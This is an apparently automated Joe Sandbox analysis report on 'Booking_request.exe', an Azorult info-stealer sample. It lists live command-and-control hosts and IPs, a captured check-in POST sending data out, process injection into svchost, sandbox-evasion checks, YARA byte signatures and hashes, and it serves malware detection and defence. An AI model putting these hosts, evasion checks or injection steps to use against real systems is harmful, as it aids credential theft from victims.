Play interactive tour

Edit tour

Analysis Report Booking_request.exe

Overview

General Information

Joe Sandbox Version:	28.0.0
Analysis ID:	53882
Start date:	24.02.2020
Start time:	11:04:08
Joe Sandbox Product:	Cloud
Overall analysis duration:	0h 7m 6s
Hypervisor based Inspection enabled:	true
Report type:	full
Sample file name:	Booking_request.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10x64 HVM (IE 11.1, Chrome 67, Firefox 61, Adobe Reader 18, Java 8 Update 171)
Number of analysed new started processes analysed:	17
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	EGA enabled GSI enabled (VBA) GSI enabled (Javascript) GSI enabled (Java) AMSI enabled
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.spyw.evad.winEXE@3/0@1/1
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .exe Stop behavior analysis, all processes terminated
Warnings:	Show All Exclude process from analysis (whitelisted): MpCmdRun.exe, sc.exe, dllhost.exe, BackgroundTransferHost.exe, wermgr.exe, conhost.exe, backgroundTaskHost.exe, CompatTelRunner.exe Excluded IPs from analysis (whitelisted): 52.142.119.134, 52.156.204.185, 52.229.171.202, 13.107.4.52, 13.68.93.109, 20.42.24.29, 40.91.91.94, 20.36.218.70, 2.18.68.82, 20.44.86.43, 40.90.22.190, 40.90.22.189, 40.90.22.191, 93.184.220.29, 104.18.24.243, 104.18.25.243, 40.112.91.29, 23.210.250.117, 92.122.213.194, 92.122.213.247, 52.164.221.179 Excluded domains from analysis (whitelisted): fe2.update.microsoft.com.nsatc.net, umwatson.trafficmanager.net, cs9.wac.phicdn.net, arc.msn.com.nsatc.net, ris-prod-atm-perf.trafficmanager.net, ocsp.msocsp.com, store-images.s-microsoft.com-c.edgekey.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, e12564.dspb.akamaiedge.net, ocsp.digicert.com, login.live.com, sls.update.microsoft.com, www.msftconnecttest.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, ocsp.globalsign.cloud, fs.microsoft.com, sls.update.microsoft.com.akadns.net, settings-win.data.microsoft.com, e1723.g.akamaiedge.net, ipv4.login.msa.akadns6.net, v4ncsi.msedge.net, login.msa.msidentity.com, settingsfd-geo.trafficmanager.net, ris.api.iris.microsoft.com, sls.emea.update.microsoft.com.akadns.net, 4-c-0003.c-msedge.net, fe2.update.microsoft.com, hostedocsp.globalsign.com, store-images.s-microsoft.com, ncsi.4-c-0003.c-msedge.net, login.msa.akadns6.net Report size getting too big, too many NtQueryValueKey calls found.

Detection

Strategy	Score	Range	Reporting	Whitelisted	Threat	Detection
Threshold	100	0 - 100	Report FP / FN	false	Azorult

Confidence

Strategy	Score	Range	Further Analysis Required?	Confidence
Threshold	5	0 - 5	false

Classification

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Windows Remote Management	Winlogon Helper DLL	Process Injection411	Software Packing1	Credential Dumping	Virtualization/Sandbox Evasion1	Application Deployment Software	Data from Local System	Data Compressed	Standard Non-Application Layer Protocol2	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Replication Through Removable Media	Service Execution	Port Monitors	Accessibility Features	Virtualization/Sandbox Evasion1	Network Sniffing	Process Discovery1	Remote Services	Data from Removable Media	Exfiltration Over Other Network Medium	Standard Application Layer Protocol12	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
External Remote Services	Windows Management Instrumentation	Accessibility Features	Path Interception	Process Injection411	Input Capture	Security Software Discovery311	Windows Remote Management	Data from Network Shared Drive	Automated Exfiltration	Custom Cryptographic Protocol	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Drive-by Compromise	Scheduled Task	System Firmware	DLL Search Order Hijacking	Obfuscated Files or Information	Credentials in Files	System Information Discovery2	Logon Scripts	Input Capture	Data Encrypted	Multiband Communication	SIM Card Swap		Premium SMS Toll Fraud
Exploit Public-Facing Application	Command-Line Interface	Shortcut Modification	File System Permissions Weakness	Masquerading	Account Manipulation	Remote System Discovery1	Shared Webroot	Data Staged	Scheduled Transfer	Standard Cryptographic Protocol	Manipulate Device Communication		Manipulate App Store Rankings or Ratings

Signature Overview

Click to jump to signature section

AV Detection:

Machine Learning detection for sample

Show sources

Source: Booking_request.exe

Joe Sandbox ML: detected

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Show sources

Source: Traffic

Snort IDS: 2029466 ET TROJAN Win32/AZORult V3.3 Client Checkin M13 192.168.2.3:49843 -> 45.147.197.20:80

Uses a known web browser user agent for HTTP communication

Show sources

Source: global traffic

HTTP traffic detected: POST /index.php HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)Host: sh1006535.had.suContent-Length: 105Cache-Control: no-cacheData Raw: 00 00 00 26 66 99 26 66 9b 42 70 9d 33 70 9d 34 70 9d 37 16 ec 26 67 ea 26 66 97 26 66 9a 26 66 9f 26 66 9a 26 66 97 26 66 9e 26 66 99 42 70 9c 47 70 9d 30 70 9d 36 70 9d 35 70 9d 30 70 9d 30 70 9d 3b 13 8b 30 6c 8b 31 11 eb 45 70 9d 31 16 e8 41 70 9d 36 70 9d 30 70 9c 47 70 9d 35 14 eb 40 70 9d 31 70 9d 33 10 ec Data Ascii: &f&fBp3p4p7&g&f&f&f&f&f&f&fBpGp0p6p5p0p0p;0l1Ep1Ap6p0pGp5@p1p3

Performs DNS lookups

Show sources

Source: unknown

DNS traffic detected: queries for: sh1006535.had.su

Posts data to webserver

Show sources

Source: unknown

Urls found in memory or binary data

Show sources

Source: svchost.exe, 00000006.00000003.586724359.0000000004DA0000.00000004.00000001.sdmp	String found in binary or memory: http://195.245.112.115/index.php
Source: Booking_request.exe, 00000000.00000002.588062787.00000000027A9000.00000004.00000001.sdmp, svchost.exe, 00000006.00000002.587143259.0000000000400000.00000040.00000001.sdmp	String found in binary or memory: http://ip-api.com/json
Source: Booking_request.exe, 00000000.00000002.588062787.00000000027A9000.00000004.00000001.sdmp, svchost.exe, 00000006.00000002.587143259.0000000000400000.00000040.00000001.sdmp	String found in binary or memory: https://dotbit.me/a/

System Summary:

Malicious sample detected (through community Yara rule)

Show sources

Source: 00000000.00000002.588278543.0000000002945000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Azorult in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.588062787.00000000027A9000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Azorult in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000002.587143259.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Azorult in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000002.587143259.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Azorult Payload Author: kevoreilly

PE / OLE file has an invalid certificate

Show sources

Source: Booking_request.exe

Static PE information: invalid certificate

Sample file is different than original file name gathered from version info

Show sources

Source: Booking_request.exe, 00000000.00000002.585333013.0000000000920000.00000002.00000001.sdmp

Binary or memory string: OriginalFilenameuser32j% vs Booking_request.exe

Yara signature match

Show sources

Source: 00000000.00000002.588278543.0000000002945000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Azorult author = JPCERT/CC Incident Response Group, description = detect Azorult in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.588062787.00000000027A9000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Azorult author = JPCERT/CC Incident Response Group, description = detect Azorult in memory, rule_usage = memory scan, reference = internal research
Source: 00000006.00000002.587143259.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Azorult author = JPCERT/CC Incident Response Group, description = detect Azorult in memory, rule_usage = memory scan, reference = internal research
Source: 00000006.00000002.587143259.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Azorult_1 author = kevoreilly, description = Azorult Payload, cape_type = Azorult Payload

PE file has section (not .text) which is very likely to contain packed code (zlib compression ratio < 0.011)

Show sources

Source: Booking_request.exe

Static PE information: Section: .rr ZLIB complexity 0.999912239225

Classification label

Show sources

Source: classification engine

Classification label: mal100.spyw.evad.winEXE@3/0@1/1

Creates mutexes

Show sources

Source: C:\Windows\SysWOW64\svchost.exe	Mutant created: \Sessions\1\BaseNamedObjects\A75A074CB-9414907A-356338F9-EF2CFB53-6AEC20EB
Source: C:\Users\user\Desktop\Booking_request.exe	Mutant created: \Sessions\1\BaseNamedObjects\b2Zm

PE file has an executable .text section and no other executable section

Show sources

Source: Booking_request.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Reads software policies

Show sources

Source: C:\Users\user\Desktop\Booking_request.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Reads the hosts file

Show sources

Source: C:\Windows\SysWOW64\svchost.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Sample reads its own file content

Show sources

Source: C:\Users\user\Desktop\Booking_request.exe

File read: C:\Users\user\Desktop\Booking_request.exe

Jump to behavior

Spawns processes

Show sources

Source: unknown	Process created: C:\Users\user\Desktop\Booking_request.exe 'C:\Users\user\Desktop\Booking_request.exe'
Source: unknown	Process created: C:\Windows\SysWOW64\svchost.exe C:\Windows\System32\svchost.exe
Source: C:\Users\user\Desktop\Booking_request.exe	Process created: C:\Windows\SysWOW64\svchost.exe C:\Windows\System32\svchost.exe	Jump to behavior

Submission file is bigger than most known malware samples

Show sources

Source: Booking_request.exe

Static file information: File size 1569992 > 1048576

PE file has a big raw section

Show sources

Source: Booking_request.exe

Static PE information: Raw size of .rr is bigger than: 0x100000 < 0x110a00

PE file contains a mix of data directories often seen in goodware

Show sources

Source: Booking_request.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: Booking_request.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: Booking_request.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: Booking_request.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Booking_request.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: Booking_request.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Contains modern PE file flags such as dynamic base (ASLR) or NX

Show sources

Source: Booking_request.exe

Static PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

PE file contains a debug data directory

Show sources

Source: Booking_request.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

PE file contains a valid data directory to section mapping

Show sources

Source: Booking_request.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: Booking_request.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: Booking_request.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: Booking_request.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: Booking_request.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Data Obfuscation:

PE file contains an invalid checksum

Show sources

Source: Booking_request.exe

Static PE information: real checksum: 0x18086a should be: 0x189dcc

PE file contains sections with non-standard names

Show sources

Source: Booking_request.exe

Static PE information: section name: .rr

Malware Analysis System Evasion:

Checks if the current machine is a sandbox (GetTickCount - Sleep)

Show sources

Source: C:\Users\user\Desktop\Booking_request.exe

Function Chain: GetTickCount - Sleep - GetTickCount

Checks if the current machine is a sandbox (GlobalMemoryStatusEx - GetDesktopWindow - CreateToolhelp32Snapshot)

Show sources

Source: C:\Users\user\Desktop\Booking_request.exe

Function Chain: GlobalMemoryStatusEx - GetDesktopWindow - CreateToolhelp32Snapshot

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Show sources

Source: Booking_request.exe, 00000000.00000002.585495140.000000000099E000.00000004.00020000.sdmp	Binary or memory string: FRIDA-WINJECTOR-HELPER-32.EXE
Source: Booking_request.exe, 00000000.00000002.585495140.000000000099E000.00000004.00020000.sdmp	Binary or memory string: FRIDA-WINJECTOR-HELPER-64.EXE
Source: Booking_request.exe, 00000000.00000002.585495140.000000000099E000.00000004.00020000.sdmp	Binary or memory string: KERNEL32FRIDA-WINJECTOR-HELPER-32.EXE
Source: Booking_request.exe, 00000000.00000002.585495140.000000000099E000.00000004.00020000.sdmp	Binary or memory string: USER32.DLLFRIDA-WINJECTOR-HELPER-64.EXE

May try to detect the virtual machine to hinder analysis (VM artifact strings found in memory)

Show sources

Source: Booking_request.exe, 00000000.00000002.585495140.000000000099E000.00000004.00020000.sdmp	Binary or memory string: VBoxService.exe
Source: Booking_request.exe, 00000000.00000002.585495140.000000000099E000.00000004.00020000.sdmp	Binary or memory string: qemu-ga.exe
Source: Booking_request.exe, 00000000.00000002.585495140.000000000099E000.00000004.00020000.sdmp	Binary or memory string: VBoxTray.exe
Source: Booking_request.exe, 00000000.00000002.585495140.000000000099E000.00000004.00020000.sdmp	Binary or memory string: VBoxTray.exeKernel32.dllKernel32GlobalMemoryStatusEx

Queries a list of all running processes

Show sources

Source: C:\Users\user\Desktop\Booking_request.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging:

Checks if the current process is being debugged

Show sources

Source: C:\Users\user\Desktop\Booking_request.exe

Process queried: DebugFlags

Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)

Show sources

Source: C:\Windows\SysWOW64\svchost.exe

Network Connect: 45.147.197.20 80

Jump to behavior

Allocates memory in foreign processes

Show sources

Source: C:\Users\user\Desktop\Booking_request.exe

Memory allocated: C:\Windows\SysWOW64\svchost.exe base: 400000 protect: page execute and read and write

Jump to behavior

Injects a PE file into a foreign processes

Show sources

Source: C:\Users\user\Desktop\Booking_request.exe

Memory written: C:\Windows\SysWOW64\svchost.exe base: 400000 value starts with: 4D5A

Jump to behavior

Writes to foreign memory regions

Show sources

Source: C:\Users\user\Desktop\Booking_request.exe	Memory written: C:\Windows\SysWOW64\svchost.exe base: 400000	Jump to behavior
Source: C:\Users\user\Desktop\Booking_request.exe	Memory written: C:\Windows\SysWOW64\svchost.exe base: 401000	Jump to behavior
Source: C:\Users\user\Desktop\Booking_request.exe	Memory written: C:\Windows\SysWOW64\svchost.exe base: 41B000	Jump to behavior
Source: C:\Users\user\Desktop\Booking_request.exe	Memory written: C:\Windows\SysWOW64\svchost.exe base: 41C000	Jump to behavior
Source: C:\Users\user\Desktop\Booking_request.exe	Memory written: C:\Windows\SysWOW64\svchost.exe base: 41D000	Jump to behavior
Source: C:\Users\user\Desktop\Booking_request.exe	Memory written: C:\Windows\SysWOW64\svchost.exe base: 41E000	Jump to behavior
Source: C:\Users\user\Desktop\Booking_request.exe	Memory written: C:\Windows\SysWOW64\svchost.exe base: 2FDC008	Jump to behavior

Creates a process in suspended mode (likely to inject code)

Show sources

Source: C:\Users\user\Desktop\Booking_request.exe

Process created: C:\Windows\SysWOW64\svchost.exe C:\Windows\System32\svchost.exe

Jump to behavior

Language, Device and Operating System Detection:

Queries the cryptographic machine GUID

Show sources

Source: C:\Windows\SysWOW64\svchost.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information:

Yara detected Azorult

Show sources

Source: Yara match	File source: 00000000.00000002.588278543.0000000002945000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.588062787.00000000027A9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.587143259.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Booking_request.exe PID: 1816, type: MEMORY
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 4412, type: MEMORY

Yara detected Azorult Info Stealer

Show sources

Source: Yara match	File source: 00000000.00000002.588278543.0000000002945000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.588062787.00000000027A9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.587143259.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Booking_request.exe PID: 1816, type: MEMORY
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 4412, type: MEMORY

Malware Configuration

No configs have been found

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Simulations

Behavior and APIs

No simulations

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
Booking_request.exe	100%	Joe Sandbox ML

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

No Antivirus matches

Yara Overview

Initial Sample

No yara matches

PCAP (Network Traffic)

No yara matches

Dropped Files

No yara matches

Memory Dumps

Source	Rule	Description	Author	Strings
00000000.00000002.588278543.0000000002945000.00000004.00000001.sdmp	Azorult	detect Azorult in memory	JPCERT/CC Incident Response Group	0x182a8:$v1: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1) 0x18908:$v1: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1) 0x19ff0:$v2: http://ip-api.com/json 0x18c62:$v3: C6 07 1E C6 47 01 15 C6 47 02 34
00000000.00000002.588278543.0000000002945000.00000004.00000001.sdmp	JoeSecurity_Azorult	Yara detected Azorult Info Stealer	Joe Security
00000000.00000002.588278543.0000000002945000.00000004.00000001.sdmp	JoeSecurity_Azorult_1	Yara detected Azorult	Joe Security
00000000.00000002.588062787.00000000027A9000.00000004.00000001.sdmp	Azorult	detect Azorult in memory	JPCERT/CC Incident Response Group	0x964cc:$v1: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1) 0x96b2c:$v1: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1) 0x98214:$v2: http://ip-api.com/json 0x96e86:$v3: C6 07 1E C6 47 01 15 C6 47 02 34
00000000.00000002.588062787.00000000027A9000.00000004.00000001.sdmp	JoeSecurity_Azorult	Yara detected Azorult Info Stealer	Joe Security
00000000.00000002.588062787.00000000027A9000.00000004.00000001.sdmp	JoeSecurity_Azorult_1	Yara detected Azorult	Joe Security
00000006.00000002.587143259.0000000000400000.00000040.00000001.sdmp	Azorult	detect Azorult in memory	JPCERT/CC Incident Response Group	0x18618:$v1: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1) 0x18c78:$v1: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1) 0x1a360:$v2: http://ip-api.com/json 0x18fd2:$v3: C6 07 1E C6 47 01 15 C6 47 02 34
00000006.00000002.587143259.0000000000400000.00000040.00000001.sdmp	JoeSecurity_Azorult	Yara detected Azorult Info Stealer	Joe Security
00000006.00000002.587143259.0000000000400000.00000040.00000001.sdmp	JoeSecurity_Azorult_1	Yara detected Azorult	Joe Security
00000006.00000002.587143259.0000000000400000.00000040.00000001.sdmp	Azorult_1	Azorult Payload	kevoreilly	0x18878:$code1: C7 07 3C 00 00 00 8D 45 80 89 47 04 C7 47 08 20 00 00 00 8D 85 80 FE FF FF 89 47 10 C7 47 14 00 ... 0x12cac:$string1: SELECT DATETIME( ((visits.visit_time/1000000)-11644473600),"unixepoch")
Process Memory Space: Booking_request.exe PID: 1816	JoeSecurity_Azorult	Yara detected Azorult Info Stealer	Joe Security
Process Memory Space: Booking_request.exe PID: 1816	JoeSecurity_Azorult_1	Yara detected Azorult	Joe Security
Process Memory Space: svchost.exe PID: 4412	JoeSecurity_Azorult	Yara detected Azorult Info Stealer	Joe Security
Process Memory Space: svchost.exe PID: 4412	JoeSecurity_Azorult_1	Yara detected Azorult	Joe Security

Unpacked PEs

No yara matches

Sigma Overview

No Sigma rule has matched

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Startup

System is w10x64_hvm

Booking_request.exe (PID: 1816 cmdline: 'C:\Users\user\Desktop\Booking_request.exe' MD5: FF17014CBB249E173309A9E1251E4574)

svchost.exe (PID: 4412 cmdline: C:\Windows\System32\svchost.exe MD5: FA6C268A5B5BDA067A901764D203D433)

cleanup

Created / dropped Files

No created / dropped files found

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
sh1006535.had.su	45.147.197.20	true	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://sh1006535.had.su/index.php	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Reputation
http://195.245.112.115/index.php	svchost.exe, 00000006.00000003.586724359.0000000004DA0000.00000004.00000001.sdmp	false	unknown
http://ip-api.com/json	Booking_request.exe, 00000000.00000002.588062787.00000000027A9000.00000004.00000001.sdmp, svchost.exe, 00000006.00000002.587143259.0000000000400000.00000040.00000001.sdmp	false	high
https://dotbit.me/a/	Booking_request.exe, 00000000.00000002.588062787.00000000027A9000.00000004.00000001.sdmp, svchost.exe, 00000006.00000002.587143259.0000000000400000.00000040.00000001.sdmp	false	unknown

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Country	Flag	ASN	ASN Name	Malicious
45.147.197.20	Ukraine		204601	unknown	false

Static File Info

General
File type:	PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Entropy (8bit):	7.7456665998838785
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	Booking_request.exe
File size:	1569992
MD5:	ff17014cbb249e173309a9e1251e4574
SHA1:	951d86a32b4c894d0c2cabef15169896ba5cc667
SHA256:	c3d5277a4f36f225c01cc9addfc46c1d83c89806ca609235f3b7469b79a30a52
SHA512:	711b6dc1ee18ef9c18e7e31fd671601bd8e3be2f5b940dfd7f47cb6cdb1c2a88e0c436060aed3273f6f974238bf5036e0084376c137f3f2a84076099c62b9da6
SSDEEP:	24576:v7pp8VT33GK1K5+Kitgqw0Q8Cj983NL8afZBX+syc/fDwjxf0PUr+Or7/2va9jb:v7pp8VT33tK5+KGgqw0Q1j989L8axEtF
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........9/T.XA..XA..XA..>B..XA..>D.]XA..>E..XA..0B..XA..0D..XA..0E..XA..>@..XA..X@..XA.w1H..XA..XA..XA.w1...XA.w1C..XA.Rich.XA........

File Icon


Icon Hash:	34e4c4d3c1c1d4e8

Static PE Info

General
Entrypoint:	0x432387
Entrypoint Section:	.text
Digitally signed:	true
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	32BIT_MACHINE, EXECUTABLE_IMAGE
DLL Characteristics:	TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Time Stamp:	0x5E4BAD16 [Tue Feb 18 09:23:34 2020 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	0
File Version Major:	6
File Version Minor:	0
Subsystem Version Major:	6
Subsystem Version Minor:	0
Import Hash:	7540297183c3e9767a796ad43bd5c7a0

Authenticode Signature

Signature Valid:	false
Signature Issuer:	CN=Microsoft Code Signing PCA, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
Signature Validation Error:	The digital signature of the object did not verify
Error Number:	-2146869232
Not Before, Not After	8/11/2017 1:11:15 PM 8/11/2018 1:11:15 PM
Subject Chain	CN=Microsoft Corporation, OU=MOPR, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
Version:	3
Thumbprint MD5:	0F1A213D4DEFE693E7126AC57D432DBC
Thumbprint SHA-1:	5EAD300DC7E4D637948ECB0ED829A072BD152E17
Thumbprint SHA-256:	FB2E0C65764535337434C74236BF4A109FD96E6D392828251D95086B6FD819C7
Serial:	33000001797C2E574E52E1CAD6000100000179

Entrypoint Preview

Instruction
call 220CE3B1h
jmp 220CD9EFh
mov ecx, dword ptr [ebp-0Ch]
mov dword ptr fs:[00000000h], ecx
pop ecx
pop edi
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
push ecx
ret
mov ecx, dword ptr [ebp-10h]
xor ecx, ebp
call 220CD38Ah
jmp 220CDB50h
push eax
push dword ptr fs:[00000000h]
lea eax, dword ptr [esp+0Ch]
sub esp, dword ptr [esp+0Ch]
push ebx
push esi
push edi
mov dword ptr [eax], ebp
mov ebp, eax
mov eax, dword ptr [0045E07Ch]
xor eax, ebp
push eax
push dword ptr [ebp-04h]
mov dword ptr [ebp-04h], FFFFFFFFh
lea eax, dword ptr [ebp-0Ch]
mov dword ptr fs:[00000000h], eax
ret
push eax
push dword ptr fs:[00000000h]
lea eax, dword ptr [esp+0Ch]
sub esp, dword ptr [esp+0Ch]
push ebx
push esi
push edi
mov dword ptr [eax], ebp
mov ebp, eax
mov eax, dword ptr [0045E07Ch]
xor eax, ebp
push eax
mov dword ptr [ebp-10h], eax
push dword ptr [ebp-04h]
mov dword ptr [ebp-04h], FFFFFFFFh
lea eax, dword ptr [ebp-0Ch]
mov dword ptr fs:[00000000h], eax
ret
push eax
push dword ptr fs:[00000000h]
lea eax, dword ptr [esp+0Ch]
sub esp, dword ptr [esp+0Ch]
push ebx
push esi
push edi
mov dword ptr [eax], ebp
mov ebp, eax
mov eax, dword ptr [0045E07Ch]
xor eax, ebp
push eax
mov dword ptr [ebp-10h], esp
push dword ptr [ebp-04h]
mov dword ptr [ebp-04h], FFFFFFFFh

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x5d194	0x50	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x61000	0xa6c7	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x17b600	0x3ec8	.rr
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x6c000	0x2640	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x5b6b0	0x38	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x5b788	0x18	.rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x5b6e8	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x4e000	0x184	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x4ca6f	0x4cc00	False	0.471043490432	ump; DBase 3 data file	6.18164838537	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata	0x4e000	0xfa62	0xfc00	False	0.487103174603	ump; data	5.40686836361	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x5e000	0x21a8	0x1000	False	0.212646484375	ump; data	3.229547095	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc	0x61000	0xa6c7	0xa800	False	0.0521995907738	ump; data	2.83288306169	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x6c000	0x2640	0x2800	False	0.7126953125	ump; data	6.49255813867	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
.rr	0x6f000	0x111000	0x110a00	False	0.999912239225	ump; Applesoft BASIC program data	7.9997801217	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
AFX_DIALOG_LAYOUT	0x611ac	0x2	ump; data	Russian	Russia
RT_ICON	0x611b0	0x94a8	ump; data
RT_DIALOG	0x6a658	0x114	ump; data	Russian	Russia
RT_GROUP_ICON	0x6a76c	0x14	ump; MS Windows icon resource - 1 icon
RT_MANIFEST	0x6a780	0xf47	ump; XML document text	English	United States

Imports

DLL	Import
